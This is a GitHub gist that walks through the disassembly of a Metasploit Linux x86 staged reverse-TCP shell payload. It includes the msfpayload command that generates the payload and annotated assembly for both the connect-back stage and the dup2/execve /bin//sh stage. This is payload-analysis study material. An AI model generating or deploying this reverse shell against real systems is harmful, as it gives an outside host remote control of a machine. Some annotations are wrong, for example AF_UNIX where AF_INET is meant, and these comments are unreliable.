Last active
August 29, 2015 14:25
-
-
Save xstpl/64da47d0e769aa09efc1 to your computer and use it in GitHub Desktop.
reverse_nonx_tcp.rb
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@xstpl:~# msfpayload linux/x86/shell/reverse_nonx_tcp LHOST=192.168.1.1 LPORT=4444 R > reverse_nonx_tcp.bin | |
root@xstpl:~# ndisasm -b32 -p intel reverse_nonx_tcp.bin | |
00000000 31DB xor ebx,ebx ; | |
00000002 53 push ebx ; protocol = 0 | |
00000003 43 inc ebx ; int socket(int domain, int type, int protocol); | |
00000004 53 push ebx ; type = SOCK_STREAM | |
00000005 6A02 push byte +0x2 ; domain = AF_UNIX | |
00000007 6A66 push byte +0x66 ; int socketcall(int call, unsigned long *args); | |
00000009 58 pop eax ; call = 1 (socket) | |
0000000A 89E1 mov ecx,esp ; args = domain, type, protocol ;struct sockaddr_in { | |
0000000C CD80 int 0x80 ; ; short sin_family; | |
0000000E 97 xchg eax,edi ; edi contains the socket descriptor ; unsigned short sin_port; | |
0000000F 5B pop ebx ; ebx = 2 ; struct in_addr sin_addr; | |
00000010 68C0A80101 push dword 0x101a8c0 ; ip = 192.168.1.1 (c0 a8 01 1) ; char sin_zero[8]; | |
00000015 6668115C push word 0x5c11 ; port 4444 (115c) ;}; | |
00000019 6653 push bx ; sin_family = 2 ;struct in_addr { | |
0000001B 89E1 mov ecx,esp ; ; unsigned long s_addr;}; | |
0000001D 6A66 push byte +0x66 ; int socketcall(int call, unsigned long *args); | |
0000001F 58 pop eax ; | |
00000020 50 push eax ; addrlen | |
00000021 51 push ecx ; struct sockaddr | |
00000022 57 push edi ; the sockfd | |
00000023 89E1 mov ecx,esp ; args from socketcall | |
00000025 43 inc ebx ; call = int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen); | |
00000026 CD80 int 0x80 | |
00000028 5B pop ebx ; the sockfd | |
00000029 99 cdq ; EDX:EAX sign-extend of AX (EDX=0) | |
0000002A B60C mov dh,0xc ; edx = 3072 | |
0000002C B003 mov al,0x3 ; ssize_t read(int fd, void *buf, size_t count); | |
0000002E CD80 int 0x80 ; Have I forgot to mention this is STAGE 1? :p | |
00000030 FFE1 jmp ecx ; we jump to *buf (what ever we read!) | |
------------------------------------------------------------------------------------------------------------------------------------------------------------- | |
Stage 2 - obtained using gdb | |
------------------------------------------------------------------------------------------------------------------------------------------------------------- | |
00000000 mov ebx,edi ; remember, edi is where we keep sockfd | |
00000002 push 0x2 ; newfd = {stderr;stdin;stdout} | |
00000004 pop ecx ; we keep decrementing ecx, until we duplicate them all | |
00000005 push 0x3f ; int dup2(int oldfd, int newfd); | |
00000007 pop eax ; dup2() makes newfd be the copy of oldfd | |
00000008 int 0x80 ; | |
0000000a dec ecx ; decrement ecx to cover all std* | |
0000000b jns 000000005 ; jump until SF, CX=-1 | |
0000000d push 0xb ; int execve(const char *filename, char *const argv[], char *const envp[]); | |
0000000f pop eax ; execve() executes the program pointed to by filename. | |
00000010 cdq ; EDX:EAX sign-extend of AX (EDX=0) | |
00000011 push edx ; null string terminator | |
00000012 push 0x68732f2f ; hs// | |
00000017 push 0x6e69622f ; nib/ | |
0000001c mov ebx,esp ; filename= /bin//sh | |
0000001e push edx ; envp = 0 | |
0000001f push ebx ; argv = ["/bin//sh"] | |
00000020 mov ecx,esp ; | |
00000022 int 0x80 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment